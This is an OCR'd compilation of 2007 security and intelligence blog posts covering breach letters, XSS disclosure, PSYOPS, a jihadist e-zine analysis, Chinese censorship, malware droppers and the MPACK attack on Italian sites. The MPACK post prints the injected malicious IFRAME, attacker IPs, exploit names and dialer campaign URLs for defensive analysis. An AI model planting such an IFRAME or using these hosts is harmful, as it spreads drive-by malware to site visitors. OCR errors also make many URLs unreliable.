of4m-securitv-market.html 
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Data Breach Sample Letters of Notification (2007- 
06-04 15:15) 

Dear customer, to ensure your satisfaction with our quality 
services we're notifying you that our inability to protect your 
























sensitive data has resulted in its leakage on the World Wide 
Web thus, stay tuned for possible identity theft and 
spending the next couple of years explaining how it wasn't 
you who bought that luxurious yacht your bank wants you 

to pay for. By the time our stolen laptops get connected to 
the Internet - which we doubt anyway - they will phone 

back helping us locate them which doesn't mean we didn't 
breach the confidentiality of your personal information, 

and are just trying to be socially responsible in the time of 
notification. 

Sincerely, 

Your favorite and customer-friendly breached retailer 

Perhaps the most comprehensive [ljarchive of scanned data 
breach letters of notification on U.S based com¬ 
panies, I've come across to so far. Well worth going through 
in case you wonder on what tone does a breached 

company use to maintain its weakened brand image, and to 
prevent a PR disaster. 

Related posts: 

[2] To report, or not to report? 

[3] Personal Data Security Breaches - 2000/2005 

[4] A Chart of Personal Data Security Breaches 2005-2006 

[5] Getting paid forgetting hacked 

1. http://www.cwalsh.or a /Breachlnfo/primarv_sources/ 






2. http://ddanchev.blo as pot.com/2QQ6/Ql/to-report-or-not- 
to-report.html 


3. http://ddanchev.blo as pot.com/20Q6/01/personal-data- 
securitv-breaches.html 
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4. http://ddanchev.blo as pot.com/2QQ6/ll/chart-of-personal- 
data-securitv.html 

5. http://ddanchev.blo as pot.com/2QQ6/Q3/ a ettin a- paid-for- 
a ettin a -hacked 17.html 
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gOt XSSed? (2007-06-04 15:48) 

Following previous posts on [l]XSSing The Planet and 
[2]XSS Vulnerabilities in E-banking Sites, here's a full 
disclosure project that's basically [3]categorizing user- 
submitted XSS vulnerabilities by 
pagerank/government/public entity, 

with mirrored XSSed pages. 

Even a .secured TLD name is nothing more than [4]a false 
feeling of security with phishers still loading con¬ 
tent from E-banking providers' sites, and actively exploiting 
XSS vulnerabilities to make their scams use the bank's 

site. Therefore from a business development perspective 
you ought to realize that [5]overperforming in a developing 























[6]market segment, is sometimes more profitable than 
being a pioneer with an idea the market's not willing to 

anticipate for the time being - perhaps for the best. 

1. http://ddanchev.blo as pot.com/2QQ7/Q5/xss-olanet.html 

2. http://ddanchev.blo as pot.com/2Q07/Q2/xss- 
vulnerabilit i es-in-e-bankin a -sites.html 

3. http://xssed.com/archive/speciaNl/ 

4. http://it.slashdot.or g /article.pl7sid=07/05/20/1729217 

5. http://ddanchev.blo as pot.com/2QQ7/Q3/take-this- 
malicious-site-down.html 

6. http://ddanchev.blo as pot.com/2QQ7/Q4/takin a -down- 
phishin a -sites-business.html 
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CIA's "Upcoming" Black Ops Against Iran (2007-06-06 
13:37) 

Recent articles pointing out on a U.S President Bush's 
[l]clearance for CIA black operations against Iran, make it 

sound like it's something the CIA haven't been doing for 
decades already. Here's an example of a spy thriller in real 

life on how the [2]CIA helped U.S embassy workers escape 
the country unharmed during Iran's revolution by using a 

fake sci-fi movie production as an excuse : 






















"He was stuck. For about a week, no one in Washington or 
Ottawa could invent a reason for anyone to be in Tehran. 

Then Mendez hit upon an unusual but strangely credible 
plan: He'd become Kevin Costa Harkins, an Irish film 

producer leading his preproduction crew through Iran to do 
some location scouting for a big-budget Hollywood epic. 

Mendez had contacts in Hollywood from past collaborations. 
(After all, they were in the same business of creating 

false realities.) And it wouldn't be surprising, Mendez 
thought, that a handful of eccentrics from Tinseltown might 
be oblivious to the political situation in revolutionary Iran. 
The Iranian government, incredibly, was trying to encourage 
international business in the country. They needed the hard 
currency, and a film production could mean millions of 

US dollars. 11 

Today's active black ops doctrine isn't hapenning without 
[3]Iran taking notice of course : 

" Other Iranian Americans also have been prohibited from 
leaving Iran in recent months, including Parnaz Az- 

ima, a journalist for the U.S.-funded Radio Farda; AN Shakeri, 
a founding board member of the Center for Citizen 

Peacebuilding at the University of California, Irvine; and 
Kian Tajbakhsh, consultant working for George Soros' Open 
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Society Institute. 11 



Realizing the U.S's inability to wage conventional war on yet 
another front - from a PR point of view not lack 

of capacity - the CIA is logically putting more efforts into 
undermining a religious regime where it hurts most - Iran's 
overall isolation from the world's economic markets and a 
fact with which no one from the international community 

is feeling comfortable with, namely, [4]lran's continuing 
efforts to supply the enemies - [5]Hezbollah - of its enemies 

- the U.S - with technology and know how that was 
supposedly hard to acquire. 

Capitalism has the power to undermine any regime except 
perhaps one whose foundations are purely reli¬ 
gious such as with Islam, therefore dirty tricks like the ones 
fabricating evidence and making the average Iranian 

perceive its current rulers as a corrupt puppets of behind a 
power-driven vision, seems to be a way of destabilizing 

the regime. Another recent example of an unamed 
intelligence agency's PSYOPS team aiming to a achieve a 
di sorted 

media-echo by distributing false rumors and relying on that 
basis that there's truth in every rumour, was that of 

[6]Muammar Gaddafi's coma speculations that quickly 
spread around the world. But what was the purpose of this 

hoax? Let's clarify - to achieve a media echo effect abusing 
the mainstream media's major weakness in respect to 



always trying to be the first to spread a ground breaking 
event. What did the colonel do once he found out he was in 

a come? Instead of ignoring, he fell victim into an even more 
well-thought of trap, and responded that the'll sue the 

news agency that came up with the hoax, thus, achieving 
an even more sucessful media echo effect. If you want to 

destroy a regime, you destroy it from inside-to-outside, not 
the other way around and perhaps the key objective of 

this PSYOPS was to help the regime's citizen's envision a 
future without their leader, even for a few hours before the 
fact is once again on the front pages. Ingenious intelligence 
thinking. 

[7]PSYOPS and BLACKOPS intersect and these are among 
the many practial examples I pointed out in a previ¬ 
ous post: 

- your [8]web sites spread messages of your enemies 

- [9]sms messages and your voice mail say you're about to 
lose the war 

- yourfancy military email account is inaccessible due to 
[lOjinfo-warriors utilizing the power of the masses, thus 

script kiddies to distract the attention 

- you [lljgain participation, thus support 

- you feel like Johnny Mnemonic taking the elevator to pick 
up the 320 GB of R &D data when a [ 12Jguerilla info-warrior 
appears on the screen and wakes you up on your current 
stage of brainwashing 



- starting from the basics that the only way to [13]ruin a 
socialist type of government is to introduce its citizens to 
the joys of capitalism - it always works 

- [14]hacktivism - traffic acquisition plus undermining 
confidence 

- propaganda - [15]North Korea is quite experienced 

- self-serving news items, commissioned ones 

- achieving Internet echo as a primary objective 

- introducing biased exclusiveness 

- stating primary objectives as facts that have already 
happened 

- impersonation 

1. 

http://blo a s.abcnews.com/theblotter/2QQ7/Q5/bush authoriz 
es.html 


2. http://www.wired.com/wired/archive/15.Q5/feat_cia.html 

3. http://www.voanews.com/en a lish/2QQ7-Q5-3Q-voa5Q.cfm 

4. http://ddanchev.blo as pot.com/2QQ7/01/transferrin g- 
sensitive-militarv.html 

5. http://ddanchev.blo as pot.com/2QQ6/Q9/hezbollahs-use-of- 
unmanned-aerial.html 

6 . 

http://www.dailvmail.co.uk/ paa es/live/articles/news/worldne 
ws.html?in articleJd=454828&in pag e _id = 1811 




















7. http://ddanchev.blo as pot.com/2QQ6/Q9/internet- PSvops- 
ps vcholo a ical.html 

8. http://www.nato.int/docu/review/2001/01Q4-Q4.htm 
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9. 

http://www.boin a boin a .net/2QQ6/07/28/israel_usin a _sms_re 

c.html 


10. http://ddanchev.blo as pot.com/2QQ6/Q9/chinese-hackers- 
attackin a -us.html 

11 . 

http://www.boin a boin a .net/20Q6/07/18/ima a e_of_the_dav_c 

hi.html 


12. http://www.thea a e.com.au/news/technolo a v/israel- 
hacks-into-hezbollah-tv- 
radio/2QQ6/08/Q2/1154198175Q78.ht 

ml 

13. http://cr v ptome.or a /invent-intel.htm 

14. http://ddanchev.blo as pot.com/2QQ6/Q2/hacktivism- 
tensions.html 


15. http://ddanchev.blo as pot.com/2QQ6/Q8/north-koreas- 
strate a ic-developments.html 
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Security Cartoons (2007-06-06 13:47) 





































Despite that the main goal of the initiative is to build better 
awareness among the average Internet user through 

[l]security cartoons, it's also very entertaining for someone 
professionally in the field. The original [2]press release : 

" The cartoons we have developed obviously are not a 
textbook approach, not made for professional jour¬ 
nals or geared to an audience of professional researchers," 
said Srikwan, who is the graphic designer of [3] 

www.SecurityCartoon.com 

. "We wanted this to be accessible to anyone who uses the 
Internet - general consumers, teenagers, teachers and 

anybody who banks or shops online. That's why the cartoon 
format is perfect - everybody can relate to it. The 

cartoons cover online security issues such as phishing, 
pharming, malware, spoofing and password protection. But 

as opposed to most other educational efforts relating to 
these topics, the cartoons do not only teach its readers what 
to do and not to do, but why, too. " 

Is [4]buiIding security awareness in the age of malicious 
economies of scale worth the investment in terms of 

outsourcing the program details to an experienced vendor? 
You bet, and what I especially like about the cartoons 

collection is its vendor-independent position, namely it's not 
promoting the idea of the product concept myopia and 

product as the solution to the threat, but vigilance and 
maintaining a decent situational awareness while online. 



The rest is up to a vendor's marketing and sales department 
trying to hopefully get more customers and prove their 

solution outperforms the rest of the vendors, compared to a 
profit-margin centered vendor, trying to squeeze out 

the juice from a commoditized product or a solution but 
lacking any major differentiation points. 

Here are [5]two more great collections of [6]security 
cartoons as well. 

1. http://securitvcartoon.com/ 

2. http://newsinfo.iu.edu/news/ paa e/normal/5765.html 

3. http://www.securitvcartoon.com/ 

4. http://securitv.isu.edu/pdf/securit v- polic v.pdf 

5. http://www.packetstormsecuritv.or a /unix- 
humor/i ndexdate.html 

6. http://www.networkintrusion.co.uk/cartoons.htm 
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An Analysis of the Technical Mujahid - Issue Two 
( 2007 - 06-07 13 : 41 ) 

Good afternoon everyone, shall we enjoy some fried cyber 
jihadists for lunch? I'd say let's go for it. After [ljanalyzing 
issue one of the Technical Mujahid couple of months ago, 
the post continues to be among the most popular ones at 

















this blog, and best of all - I've virtually met with people 
whose knowledge intimacy I'd never ruin by physically 
meeting with them. In a globalized world, OSINT is your 
early warning system and a tool for establishing social 
responsibility as a citizen of world, and I'm still sticking to 
my old saying that an OSINT conducted - a tax payer's buck 
saved somewhere. 

During March, 2007, the Al Fajr Information Center released 
the second issue of the Technical Mujahid E-zine 

(72 pages), a definite proof of their commitment towards 
educating the prone to brainwashing and radicalization 

wannabe jihadists. What has improved? Have the topics 
shifted from the general IT ones to start covering conven¬ 
tional weaponry discussions? Disturbingly yes. Whereas the 
topics still largely remain IT related, much more PSYOPS 

and discussion on weapons systems such as MANPADS- is 
included in the second issue. The myth of terrorists and 

jihadists using steganography is "thankfully" coming out of 
the dark despite how uncomfortable you may feel about 279 
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it, from a strategic point of view, the low lifes are putting 
more efforts into educating the average jihadist on how 

to generate noise, so that the real conversation can 
continue with wannabe jihadists getting caught, and the 
true 


master minds remaining safe. 


Case in point - the first issue of the magazine was covered 
by the several sources who seem to be aware of 

the forums where the real discussion and announcements 
are going, but the release of the second issue wasn't that 

well covered in comparison to their previous coverages. But 
how come? Is someone interested in getting a higher 

proportion of the upcoming departamental budget 
allocation with stories like we need petabytes of disk space 
and 

CPU on demand to analyze the ongoing conversations, or is 
the average citizen feeling more secure not knowing how 

aware both cyber and real life jihadists are? A picture is 
sometimes worth a thousand fears. Let's discuss the second 

issue of the Technical Mujahid by starting with the key 
summary points : 

Key summary points : 
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- The second issue of the magazine is diversifying its 
content to include conventional weaponry articles, espe¬ 
cially the nasty MANPADS 

- Propaganda is largely increasing, thanks to automated 
translation software and keywords density analysis 

- With articles such as the ABC of running and operating a 
Jihadist site online, the authors of the magazine are aiming 


to generate even more noise 

- There's a very experienced team of multimedia/creative 
designers applying professional layouts to the magazine 

and the articles 
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01. Article One - An Overview of Steganography and Covert 
Communications 

Article one is continuation from the discussion opened in 
the first issue on the basics of steganography and 

encryption. Rich on visual material as always, it covers a 
surprising number of steganographic techniques starting 

from watermarking, and also commenting on the process of 
steganalysis and how degrading the quality of an image 

let's say, is a major trade-off compared to encryption for 
instance. The article also includes a comparison of colors 

histogram of an original image and a steganographic one to 
showcase the trade-off. What makes an impression is 

the evolving editorial and DIY tutorials with definitions of 
technical terms at the end of each article and their Arabic 
translation.. 


Key terms from article one : 


Steganography (Steganos graphy); Steganalysis; Morse 
Code; Digital Signal and Image Processing; Watermark¬ 
ing; LSB (Least Significant Bit); MSB (Most Significant Bit); 
Histogram (Frequency distribution of RGB); One Way 

Encryption; Discrete Cosine Transform (Coefficients); 
Enhanced LSB Layers Analysis. 

Moreover, an exampe is given where Islamic military 
communications in Iraq are hidden in a 100x50 pixel pic¬ 
ture. Feeling uncomfortable with the idea of jihadists using 
steganography for communications? So do I, but keeping 

it realistic instead of denying the reality is even worse than 
actually admitting it. Something else is important to 

understand as well, and that's to overall lack of situational 
awareness of the average citizen in any contrying, still 
living in the stereotype of bunch of folks making plans on 
the sand in a distant cave somewhere in the mountains. 

Your desire to remain what you are is what limits you. 

It also worth discussing why are they including English-to- 
Arabic translations of technical terms, and I think 

the main goal is to provoke readers to start searching the 
Arabic web for related articles, perhaps a good moment 

to break the stereotype a mention that online jihadi 
communities is where visitors convert to talkers, and later 
on 

doers. 
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02. Article Two - Creating a Jihadist's Site for Newbies 

In order for jihadists to generate more noise and build a 
loyal army of believers, the authors have taken the time and 
effort to explain the basics of web design, web hosting, and 
various other issues related to building a jihadists site from 
scratch. In times of "war on ideologies", the bigger the 
community, the higher chance for possible recruitment. 

03. Article Three - An Overview of Short Range Shoulder- 
Fired 

Missiles 
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From ITsecurity to conventional weaponry articles, the shift 
is very interesting one, especially the in-depth knowledge 
on various systems and the countermeasures aircraft have 
against MANPADS. What's worth mentioning is the PSYOPS 

motive of jihadist's sandal on the top of a scrap from an 
obviously taken down helicopter. The articles concludes with 
detailed technical specifications of MANpads and by 
highlighting the dominance of the Russian [2]IGLA system. 

Key terms from article three : 

Infrared (wavelength greater than 0.7 micron); Ultraviolet 
(UV: wavelength less than 0.4 micron); Infrared seeker 

head; IFF (Identification Friend or Foe) antenna; Digital 
signal processing (DSP); Counter-Countermeasures(CCM); 


Directed infrared countermeasures [DIRCM]; Sensor- Mercury 
Cadmium Telluride (HgCdTe) 1- 24mm; Sensor- Indium 

Antimonide (InSb) 1-5.5mm 
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04. Article Four - Basics and Importance of Encryption 

Even wondered how Alice and Bob talk exchange keys in 
Arabic? This article explains in detail the basics and 

importance of encryption, and compared to issue one of the 
technical mujahid which was recommending PGP, the 

author is now recommending the [3]Mujahideen Secrets 
encryption tool. 

05. Article Five - Basics of Video Recording and Subtitling 
Clips 

286 


£ 


Wonder how did the whole jihadist multimedia revolution 
start? As it seems, there's a team of "reporters" attached to 
militant groups to take recordings of the battles and later 
one include propaganda background music and 

subtitle them to acheive an even more influential effect on 
their audience. 

Dear wannabe jihadists - if your definition of existence 
consists in your futile attempt to achieve a knowledge- 


driven jihadist community in the form of generating noise 
with armies of religiously brainwashed soldiers, you face 

extinction it's that very simple. 

1. http://ddanchev.blo as oot.com/20Q6/12/analvsis-of- 
technical-mu i ahld-issue-one.html 

2. http://en.wikipedia.or g /wiki/9K38_l ala 

3. http://ddanchev.blo as pot.com/2QQ7/04/mu i ahideen- 
secrets-encr v ption-tool.html 
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Censoring Flickr in China (2007-06-12 12:55) 

Since I've been [l]discussing China's [2]lnternet censorship 
practices, and I've been doing it pretty much since I've 

started blogging, this is the most recent example of how 
what's thought to be the most robust and sophisticated 

censorship system in world is a useless technological 
solution if not implemented "properly". The news of the 
government censoring a very popular site will spread faster, 
but instead of applying the [3]predefined subversive 

content detection practice and allow anything else, they're 
mocking their overhyped censorship system by blocking 

the entire site instead of either removing the content in 
question or blocking access to the specific Flickr set. Futile 
attempt? For sure, but far more gentle approach of 
censorship compared to the current one. 















Various [4]news sources reported that China's censoring the 
entire Flickr. 

As you can see the [5]greatfire- 

wallofchina.org test confirms the block, but it also confirms 
that [6]Flickr.com itself is not censored but any other 

content within. How come? The idea is that the user user is 
left with the impression that it's a technical glitch at 

Flickr.com compared to receiving a censorship warning or 
even a 404 when accessing the main page. Logging in 

Flickr is possible - verified though a Beijing based proxy 
manually - uploading is also possible, but not content can 

be seen. 

Flickr = a Yahoo! media company with which the Chinese 
government has been keeping close ties in the past 

so that [7]jailed journalists started filling lawsuits against 
Yahoo. Various bloggers speculated that [8]China banned 
the entire site due to the leak of protestor's photos on it, 
and taking into consideration [9]China's ongoing censorship 
of mobile communications such as SMS messages which I 
covered in a previous post, you may notice that the first 

image of the received sms for the time and place of the 
protest is censored by the photographer herself, especially 

the time of receivement. [10]The protest is also on YouTube, 
so would YouTube be logically next to get blocked? I 

doubt so as basically, the protest will position itself as an 
even more high priority issue for the Chinese government. 



The censorship trade-off, should you censor it and add more 
exclusiveness to it, or ignore and act like it's nothing 

serious? [ll]Undermine censorship by spreading the 
censored item further. 

Even more interesting is the fact that couple of months ago, 
[12]Google's shareholders were about to wage a 

proxy battle in order for them to convince top management 
in the long-term effects of censorship. [13]Google 
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convinced them that the revenues streaming from China 
with its near the top Internet population are more important 
and so they agreed. Obviously, [14]Yahoo's shareholders are 
too, not keen of the fact that their investments are 

driving the oppression of Chinese citizens, and have 
recently proposed a similar resolution : 

" Amnesty International has today (11 June) expressed its 
support for two shareholder resolutions up for vote 

at tomorrow's Yahoo! annual meeting in California, one 
calling on the company to oppose internet repression in 

countries such as China, and one requesting the creation of 
a corporate Board Committee on Human Rights. 11 

New media companies are helpless and obliged under 
Chinese law to censor if they don't want to lose the op¬ 
tion to do business in (Soviet) China, therefore a nation-2- 
nation actions must be taken especially from the world's 



major evalgelists of a free society and democracy. The rest is 
[15]a twisted reality - a [16]Tiananmen Square image 

search outside China, and a [17]Tiananmen Square image 
search in China, everything's "in order". 

1. http://ddanchev.blo as oot.com/2QQ6/Q2/chinese-internet- 
censorship-efforts.html 

2. http://ddanchev.blo as pot.com/2QQ6/Q9/media- 
censorshi p-i n-china-faa.html 

3. http://ddanchev.blo as pot.com/2QQ6/08/chinas-internet- 
censorship-report-2Q06.html 

4. http://vrQ.slashdot.or g/ vro/Q7/Q6/Q9/1914226.shtml 

5. http://ddanchev.blo as pot.com/2QQ7/03/real-time- 
censored-url-check- i n-china.html 

6. http://va.ivee.cn/2007/Q6/f1ickr-photos-banned.html 

7. http://www.kansascitv.com/438/storv/144586.html 

8. http://www.f1ickr.eom/photos/7820525Q@NQQ/ 

9. http://ddanchev.blo as pot.com/20Q6/Q7/chinas-interest-of- 
censorin a -mobile.html 

10. http://voutube.com/watch?v=xS i NK104iiA 

11. http://irrepressible.info/ 

12. http://ddanchev.blo as pot.com/2QQ6/12/ a oo a le-and- 
vahoos-shareholders-a a ainst.html 


13. http://searchen a ineland.com/Q70511-Q84348. php 











































14. http://www.amnestv.or a .uk/news details.as p? 
NewslD=17373 


15. http://ddanchev.blo as pot.com/2QQ6/Ql/twisted- 
realitv.html 

16. http://blo a .outer-court.com/files/ a oo a le-ima a es- 
censorshi p.i p.g 

17. http://blo a .outer-court.com/files/ a oo a le-ima a es- 
censorship-china .i p.g 
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Homosexual Warfare (2007-06-12 13:50) 

Applause for the non-lethal weapons R &D, but [l]a Gay 
Bomb using aphrodisiacs to provoke sexual behaviour on 

the field courtesy of the Pentagon, is far more creative than 
[2]a vomit beam for instance : 

11 In one sentence of the document it was suggested that a 
strong 

aphrodisiac 

could be dropped on enemy troops, ideally one which would 
also cause 

"homosexual behaviour". The aphrodisiac weapon was 
described as "distasteful but completely non-lethal". In its 
"New Discoveries Needed" section, the document implicitly 
acknowledges that no such chemicals are actually known. " 




















Just imagine the situation when a century later, a futuristic 
History Channel displays holograms of such war¬ 
fare activities. More info on [3]the Gay Bomb, as well as 
[4]video of soldiers on LSD - exceptional warriors win their 
battles without waging wars. 

1. http://en.wikipedia.or g /wiki/Gav bomb 

2 . 

http://blo a .wired.com/defense/20Q7/03/navv research r.ht 
ml 

3. http://cbs5.com/topstories/local_storv 159222541.html 

4. http://video. a oo a le.com/videopla v? 
docid = 5i7198Q59G28627413 
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DIY Malware Droppers in the Wild (2007-06-12 20:50) 

The revenge of the script kiddies, or the master minds 
releasing DIY tools to let 'em generate enough noise as I've 

pointed out in my [ljfuture trends of malware paper? 

Further expanding the [2]Malicious Wild West series, here 
are 

two more recently released DIY malware droppers. The 
detection rate for the generated dropper of the first one is 

disturbing given it's not even crypted : 

AVG - 06.12.2007 - Downloader.VB.KK 















NOD32v2 - 06.12.2007 - probably unknown NewHeur_PE 
virus 

Panda - 06.12.2007 - Suspicious file 
No AV detects the packer itself! 

File size : 311296 bytes 

MD5 : 1944378cba81bcd894d43d71dc5fccb5 

SHA1 : 920505f2124e8a477ab26a28f81a779d717882be 
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The second one has a much higher detection rate of both 
the packer and the dropper: 

File size : 19001 bytes 

MD5 :abad61857c4b79773326496dec11929b 

SHA1 : 5c74c3572febf7f468b41d9bdc5cbcl9eb2348b5 

PandaLabs has recently conducted [3]a study on the 
increasing use of packers and cryptors by malware au¬ 
thors worth mentioning : 

" There are many different packers. According to the 
PandaLabs study, UPX is the most common and is used in 

15 percent of the malware detected. PECompact and PE, are 
used in 10 percent of cases. However, according to 

PandaLabs, there are more than 500 types of packers that 
could be used by cyber-crooks. "In essence it is a stealth 


technique. The increasing use of these programs highlights 
how keen Internet criminals are for their creations to go 

undetected," explains Luis Corrons, technical director of 
PandaLabs. 11 

You may also be interested in finding out [4]how popular 
anti virus vendors perform agains known, but crypted 

malware. 

Related posts: 

[5] A Malware Cryptor 

[6] A Malware Cryptor 2 

[7] A Malware Loader 

1. http://www.linuxsecuritv.com/docs/malware-trends.odf 

2. http://ddanchev.blo as pot.com/2QQ7/04/shots-from- 
malicious-wild-west-sample_25.html 

3. http://www.net-securitv.or a /virus_news. ph p7id = 813 

4. http://ddanchev.blo as pot.com/2QQ7/01/testin g -anti-virus- 
software-a a ainst.html 
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5. http://ddanchev.blo as pot.com/2QQ7/Q3/shots-from- 
malidous-wild-west-sample_lQ.html 

6. http://ddanchev.blo as pot.com/2QQ7/Q5/vet-another- 
malware-cr v ptoMn-willd.html 

























7. http://ddanchev.blo as pot.com/2QQ7/Q5/malware-loader- 
for-sale.html 
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Israeli Reconnaissance Satellite C&C - Video (2007- 
06-18 12:29) 

[l]Catchy demo of a C &C center in Israel, via [2]Cryptome. 
A violation of OPSEC? Not necessarily given that some 

of the synchonized displays are blurred, but the main 
purpose behind the clip is to communicate that - "yes our 

IMINT is powerful enough". Some of the most recent 
[3]satelIite reconnaissance developments are a great 
example 

of the utopian tracking of non-existing terrorists' physical 
assets, such as boats in this case, even [4]white horses in 
Afghanistan. 


The ocean-surveillance satellites, part of the National Ocean 
Surveillance System (NOSS), will track possible terrorist 
activities at sea. The two satellites will fly in a regimented 
formation within their elliptical orbits above the Earth so 
that they will be able to precisely determine the positions of 
ocean-going vessels at different times. This data will be 
combined with data from 18 other NRO satellites orbiting 
the Earth, which are spaced apart at six or seven different 

sections above the Earth's surface. " 





And while the U.S is investing in a satellite reconnaissance 
without any "fog of war", an effort that's enviable, but 
highly innefective when it comes to fighting terrorism, Japan 
which is still heavily [ 5 ] re I y i n g on U.S sharing of 

reconnaisance satellites' data is [6]facing criticism for not 
registering some of its spy satellites, a common practice 
among many other nations : 


Tokyo has been operating spy satellites for four years that 
have not been registered with the United Nations, despite 

having signed an international treaty that requires it to 
report them. The Convention on Registration of Objects 

launched into Outer Space, adopted in 1974 and proclaimed 
in 1976, required signatories to identify the artificial 

satellites and other objects they put in space. Japan signed 
that treaty in 1983. Treaty violations are not subject to 
punishment. 11 

precisely the type of possible pre-launch information 
leakage I pointed out in [7]a previous post on stealth 

satellites : 

" You can't [8]hijack, intercept or hide from what you don't 
see or don't know it's there, and stealthy satel¬ 
lites are going to get even more attention in the ongoing 
[9]weaponization of space and the emerging [lOJspace 


warfare arms race . Here's a [lljhuge compilation of articles 
and news items related to the development of stealthy 



satellites . 
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A pre-launch leak in today's OSINT world is the worst enemy 
of the concept of stealth satellites. Here's an indepth 

[12] assessment of China's anti-satellite programs worth 
going through as well. 

Related posts: 

[13] Satellite Imagery of Secret or Sensitive Locations 

[14] U.K's Latest Military Satellite System 

[15] The History and Future of U.S. Military Satellite 
Communication Systems 

[16] China Targeting U.S Satellite - Laser Ranging or 
Demonstration of Power? 

[17] Open Source North Korean IMINT Reloaded 

[18] lran Bans Purchase of Foreign Satellite Data 

1. http://www.4law.co.il/ofek7/olaver.html 

2. http://cr v ptome.or g/ 

3. http://www.itwire.com.au/content/view/12917/1066/ 

4. http://ddanchev.blo as pot.com/2QQ6/ll/satellite-ima aerv- 
trade-offs.html 

5. http://ddanchev.blo as pot.com/2QQ6/Q7/ ia pans-reliance- 
on-us-s p v-satellites.html 















6. http://search. ia Dantimes.co. i p/c ai- 
bin/n n2Q070615fl.html 

7. http://ddanchev.blo as pot.com/2QQ6/09/stealth-satellites- 
developments-source.html 

8. http://ddanchev.blo as pot.com/2QQ6/Q8/anti-satellite- 
weapons.html 

9. http://ddanchev.blo as pot.com/2QQ6/Q7/weaponizin a- 
s pace-and-emer aina-s pace.html 

10. http://ddanchev.blo as pot.com/20Q6/Q3/is-space-warfare- 
arms-race-reallv.html 

11 . 

http://www.fas.or a/sp p/militar v/ pro a ram/track/stealth.pdf 

12 . 

http://www.uscc. a ov/research pa pers/20Q7/FINAL_REPORT_l- 
19-2007 REVISED BY MPP. pdf 

13. http://ddanchev.blo as pot.com/2QQ6/Q9/satellite- 
ima aer v-of-secret-or 28.html 

14. http://ddanchev.blo as pot.com/2QQ7/Q3/uks-latest- 
militarv-satellite-svstem.html 

15. http://ddanchev.blo as pot.com/2QQ6/lQ/historv-and- 
future-of-us-militarv.html 

16. http://ddanchev.blo as pot.com/2QQ6/lQ/china-tar a etin a- 
us-satellite-laser.html 


17. http://ddanchev.blo as pot.com/2QQ6/Q7/open-source- 
north-korean-imint.html 




















































18. http://ddanchev.blo as pot.com/2QQ7/01/iran-bans- 
purchase-of-forei a n-satellite.html 
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Massive Embedded Web Attack in Italy (2007-06-20 
13:27) 

The Web is [l]abuzz with [2]news stories [3]regarding the 
[4]MPACK web exploitation kit installed on [5]over 10,000 

mostly Italian based sites, and in the spirit of previous 
[6]analyses of malicious URLs here's an overview of the 

strategy of the attack, the outcome, and IPs in quesiton, 
thus the ones that should get blacklisted or [7]CYBERINT 

applied for further juicy details on the severity of the attack. 

The strategy of the attack 

Picture yourself in the position of a malicious attacker 
wanting to infect the highest number of PCs possible in the 

shortest timeframe. How would you go for infecting the 
highest possible proportion of internet surfers using 
outdated 

software, ones still living in the "don't open .exe 
attachments" self-vigilance world? You'll either figure out a 
way to exploit vulnerabilities within a huge number of web 
sites and automatically embed the malicious payload, or 
breach 

a shared hosting provider and infect all of its customer, thus 
potentially infecting all of their future visitors. Which is 






exactly what happened in the most recent case of what's 
turning into a massive epidemic of MPACK embedded sites. 

The outcome of the attack 

- Over 10,000 sites affected according to WebSense 

- hundreds of thousands PCs currently infected according to 
obtained MPACK statistics 

- [8]the majority of infected PCs are located in Italy given 
the breach of the [9]shared hosting provider Aruba 

Dissecting the attack 

It all started when popular Italian sites had the following 
IFRAME embedded within their front pages : 

name='StatPage' src = 'hllp://58.65.239.180/' width = 5 
height=5 
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The entire attack is currently orbiting around the 
following IPs : 

58.65.239.180 

64.38.33.13 

194.146.207.129 

194.146.207.18 

194.146.207.23 


81.177.8.30 



203.121.71.183 


81.95.148.42 
81.95.149.114 
Input URL: 58.65.239.180 
Effective URL: 

hllp://truman. dnspathing.com/suspended. page/ 
Responding IP: 64.38.33.10 

HTTP/1.1 302 Moved TemporarilyServer: nginx/0.5.17 

Date: Tue, 19 Jun 2007 22:56:01 GMT 

Content-Type: text/html 

Content-Length: 161 

Connection: keep-alive 

Location: hllp://64.38.33.13/ ftpcom/ 

More coverage : 

[10]ISC, [ll]Symantec, [12]WebSense, [13]TrendMicro, 
[14]Finjan - great to see [15]they came across my analysi 

[16]of ms-counter.com as well - [17]PandaLabs. 

UPDATE: 

[18]MPACK's Builder Screenshot courtesy of Symantec. 
Meanwhile, here are the exploits available in the lat¬ 
est 0.90 release of the web exploitation kit: 



- modified MS06-014 


- MS06-006 Firefox 1.5.x Opera 7.x 

- Oday Win2000 (ms06-044) 

- XML overflow under XP2k3 

- WebViewFolderlcon overflow 

- WinZip ActiveX overflow 

- QuickTime overflow 

- ANI overflow 

The majority of news articles I came across to are 
emphasizing that the kit is available for sale at $1000. True, 

but only if you're purchasing it from the original source, 
namely, the kit has been a commodity for quite a while, 

with different propositions modifying the source code and 
selling it for much less, even bargaining with it in case 

someone's interested in the associated in the [19]related 
underground services offered. 

Even more ironic in the case of this particular attack is that 
while performing the cyber forensics part, I came 

across another malicious site farm hosting dialers courtesy 
of CARPEDIEM. And while the IFRAME part of the massive 

embedded Italy based attack was gone in the time of 
checking the dialers, even previous instances of 
CoolWebSearch 



were still in place. The second malicious campaign is run via 
sv2.biz, campaign id = 15682, all the pOrn sites at 
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193.110.146.69 which is hosting all the dialers-embedded 
sites in question. From another perspective the benefits of 
infecting a web sites farm run on a single IP with probably 
hundreds of thousands of visitors in the shortest 

timeframe possible, has a major flaw, blocking 

192.110.146.69 aka CARPEDIEM, which is a matter of fact 
listed by 

Google as a harmful site will temporarily mitigate the threat. 

Initiating traceback of a [20]site that's participating 
in two malicious campaigns : 

1 -> hllp://www.dojinshi.biz/dojin/ 

Responding IP: 62.149.130.37 

2 -> Sites spreading the dialers within : 

hllp://www.analream.com/index.html?id = 15682 
Responding IP: 193.110.146.69 

Dynamics of infection : 

basically, the host name is identical with the distributed 
.exe's 

My _Param['rf'] = M AnalReamV2KTU M ; 

My _Param['id produit'] = 550; 



My _Param['id site'] = 995; 

My _Param['synergie'] = 'h'; 

My _Param['color'] = 'fire'; 

My _Param['name _kit'] = "AnalReam.exe 11 
Here's the entire campaign list : 
asian-booty.com/7id = 15682 
bukkakenation.com/us/index.html7id = 15 682 
devilteen.com/7id = 15682 
fetishcell.com/7id = 15682 
flowerbabes.com/index.html7id = 15 682 
mrstrollop.co.uk/index.html7id = 15682 
sexyharem.com/7id = 15682 
sorority-house.com/index.html 7 id = 15682 
su blimanal.com/us/index.html 7 id = 15682 
tottyu nited.co.uk/index.html 7 id = 15682 
trashedtramps.com/7id = 15682 
